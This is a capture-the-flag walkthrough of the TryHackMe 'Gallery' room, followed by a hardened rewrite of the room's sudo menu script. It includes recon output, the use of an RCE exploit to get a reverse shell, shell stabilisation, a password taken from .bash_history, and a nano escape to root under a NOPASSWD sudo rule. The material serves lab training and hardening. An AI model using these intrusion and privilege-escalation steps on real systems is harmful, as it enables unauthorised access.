📝 TryHackMe. Walkthrough: Gallery
Task 1.
How many ports are open?
$ nmap -A 10.10.240.133
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8080/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Answer: *
What’s the name of the CMS?
The gallery is served on port 8080, and its page title names the CMS.
Answer: S****e ****e *****ry
What’s the hash password of the admin user?
$ searchsploit Simple Image Gallery
---------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------- ---------------------------------
Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabiliti | php/webapps/49064.txt
Joomla! Component Kubik-Rubik Simple Image Gallery Extended (SIGE) 3.2.3 - Cross- | php/webapps/44104.txt
Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated) | php/webapps/50214.py
Simple Image Gallery System 1.0 - 'id' SQL Injection | php/webapps/50198.txt
---------------------------------------------------------------------------------- ---------------------------------
$ searchsploit -m 50214
Exploit: Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)
URL: https://www.exploit-db.com/exploits/50214
Path: /usr/local/opt/exploitdb/share/exploitdb/exploits/php/webapps/50214.py
File Type: Python script text executable, Unicode text, UTF-8 text, with very long lines (816)
Run the exploit, call the reverse shell and stabilize it:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Press CTRL+Z to background the shell, then run the following on the attacker machine:
stty raw -echo ; fg
reset
[ These commands give us a fully functional shell ]
Find the file with the database credentials. Next, upload adminer.php for a convenient connection (or use the terminal) and find the users table.
Answer: ****************79***be5********
What’s the user flag?
Exploring the file system, we find a backup of the home directory of the user mike. In the file .bash_history we find the password, and we try to log in as that user.
After logging in as mike, all we have to do is go into the directory /home/mike/ and read the file with the flag.
Task 2.
What’s the root flag?
See what we have in sudo.
mike@gallery:/$ sudo --list
User mike may run the following commands on gallery:
(root) NOPASSWD: /bin/bash /opt/rootkit.sh
Let’s read rootkit.sh.
mike@gallery:/$ cat /opt/rootkit.sh
#!/bin/bash
read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;
# Execute your choice
case $ans in
    versioncheck)
        /usr/bin/rkhunter --versioncheck ;;
    update)
        /usr/bin/rkhunter --update;;
    list)
        /usr/bin/rkhunter --list;;
    read)
        /bin/nano /root/report.txt;;
    *)
        exit;;
esac
Run sudo /bin/bash /opt/rootkit.sh, select the read option, and break out of nano into a shell:
^R^X
reset; sh 1>&0 2>&0
Answer: T*M{************3adfa6b8b************de87}
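The weakness in rootkit.sh is not the menu itself but the read branch: nano started under sudo runs as root, and its shell escape is therefore a root shell. The script below is an added example of how the same menu could be written without that hole; it is not the room's /opt/rootkit.sh. The rkhunter options and the report path are taken from the original, while the function names and the REPORT_FILE override are assumptions made here.

```bash
#!/bin/bash
# Added example (not the room's /opt/rootkit.sh): a hardened rewrite of the
# sudo menu script. rkhunter options and the report path come from the
# original; the function names and REPORT_FILE override are assumptions.

REPORT_FILE="${REPORT_FILE:-/root/report.txt}"

# Show the report read-only. An editor started by sudo inherits root, so its
# shell escape becomes a root shell; cat has no interactive mode and no escape.
show_report() {
    if [ ! -r "$1" ]; then
        printf 'report not readable: %s\n' "$1" >&2
        return 1
    fi
    cat -- "$1"
}

# Validate the menu answer against a fixed allowlist; anything else returns 1
# so the caller can refuse it (and log the attempt if desired).
valid_choice() {
    case "$1" in
        versioncheck|update|list|read) return 0 ;;
        *) return 1 ;;
    esac
}

# Dispatch one validated choice. Only fixed paths with fixed arguments are run;
# the user's input is never interpolated into a command line.
run_choice() {
    valid_choice "$1" || return 1
    case "$1" in
        versioncheck) /usr/bin/rkhunter --versioncheck ;;
        update)       /usr/bin/rkhunter --update ;;
        list)         /usr/bin/rkhunter --list ;;
        read)         show_report "$REPORT_FILE" ;;
    esac
}

# Interactive entry point. read -r keeps backslashes literal, and the readline
# editing of the original (-e) is dropped since plain input is all that is needed.
menu() {
    local ans
    printf '%s' "Would you like to versioncheck, update, list or read the report ? "
    read -r ans
    run_choice "$ans" || { printf 'invalid choice: %s\n' "$ans" >&2; return 1; }
}

# Run the menu only when invoked with --menu, so the file can also be sourced
# to exercise the functions individually.
[ "${1:-}" = "--menu" ] && menu
```

Two caveats remain even with this version: the script and its directory must be owned by root and not writable by the sudoer, otherwise the user simply edits the file that sudo will run; and any command the menu launches (here rkhunter) must itself have no interactive or editor mode reachable from its arguments. Reviewing every NOPASSWD rule for interactive editors and interpreters is the check that would have caught the original.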